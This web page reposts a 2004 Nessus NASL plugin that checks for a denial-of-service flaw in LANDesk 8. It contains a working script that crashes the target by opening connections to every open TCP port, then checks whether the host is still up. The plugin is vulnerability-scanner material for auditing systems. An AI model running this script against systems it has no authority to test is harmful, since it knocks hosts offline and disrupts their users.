connect to all open ports

		
Added by: A^C^E 
Date: 29.10.04 
Time: 09:10:26 
Category: Exploits 
Source: _blank>http://www.securityspace.com/smysecure/catid.html?viewsrc=1&id=15571 

Category: Denial of Service 
Title: connect to all open ports 
Summary: Crashes the machine by connecting to all open ports 
Description: 
It was possible to crash the remote system by connecting
to every open port.
This is known to bluescreen machines running LANDesk8
(In this case, connecting to two ports is enough)
Solution : inform your software vendor(s) and patch your system
Risk factor : High 
 
 
#
# This script was written by Michel Arboi <mikhail@nessus.org>
#
# See the Nessus Scripts License for details
#
# References:
# From: Ryan Rounkles <ryan.rounkles@gmail.com>
# To: vuln-dev@securityfocus.com
# Date: Tue, 19 Oct 2004 09:39:46 -0700
# Subject: Denial of service in LANDesk 8
#
if(description)
{
script_id(15571);
script_version ("$Revision: 1.2 $");
name["english"] = "connect to all open ports";
script_name(english:name["english"]);
desc["english"] = "
It was possible to crash the remote system by connecting
to every open port.
This is known to bluescreen machines running LANDesk8
(In this case, connecting to two ports is enough)
Solution : inform your software vendor(s) and patch your system
Risk factor : High";
script_description(english:desc["english"]);
summary["english"] = "Crashes the machine by connecting to all open ports";
script_summary(english:summary["english"]);
script_category(ACT_KILL_HOST);
script_copyright(english:"This script is Copyright (C) 2004 Michel Arboi");
family["english"] = "Denial of Service";
family["francais"] = "Dõm de service";
script_family(english:family["english"], francais:family["francais"]);
# script_require_ports("Services/msrdp", 3389);
# The original advisory says that we can crash the machine by connecting to
# LANDesk8 (which port is it?) and RDP simultaneously.
# I modified the attack, just in case
exit(0);
}
start_denial();
i = 0;
for (p = 1; p < 65536; p ++)
if (get_port_state(p))
{
s[i] = open_sock_tcp(p);
if (s[i]) i ++;
}
# display(i, " ports were open
");
alive = end_denial();
if(!alive)
{
security_hole(port);
set_kb_item(name:"Host/dead", value:TRUE);
exit(0);
}
for (j = 0; j < i; j ++)
close(s[j]);
 
						
		
	

补充：综合编程 , 安全编程 ,

上一个：防范Windows消息钩子的侵入
下一个：JAVASCRIPT加密解密终级指南